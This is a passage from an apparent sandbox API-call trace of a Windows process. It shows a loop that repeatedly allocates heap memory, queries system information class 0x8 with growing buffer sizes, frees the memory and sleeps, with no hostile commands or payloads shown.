ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.817] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.817] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.818] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.818] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.818] Sleep (dwMilliseconds=0x110) [0233.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.832] Sleep (dwMilliseconds=0x110) [0233.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.848] Sleep (dwMilliseconds=0x110) [0233.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.864] Sleep (dwMilliseconds=0x110) [0233.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.879] Sleep (dwMilliseconds=0x110) [0233.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.892] Sleep (dwMilliseconds=0x110) [0233.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.908] Sleep (dwMilliseconds=0x110) [0233.919] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.919] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.927] Sleep (dwMilliseconds=0x110) [0233.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.940] Sleep (dwMilliseconds=0x110) [0233.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.954] Sleep (dwMilliseconds=0x110) [0233.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.972] Sleep (dwMilliseconds=0x110) [0233.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.989] Sleep (dwMilliseconds=0x110) [0233.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.002] Sleep (dwMilliseconds=0x110) [0234.021] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.021] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.022] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.022] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.022] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.022] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.022] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.022] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.022] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.022] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.022] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.022] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.023] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.023] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.023] Sleep (dwMilliseconds=0x110) [0234.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.055] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 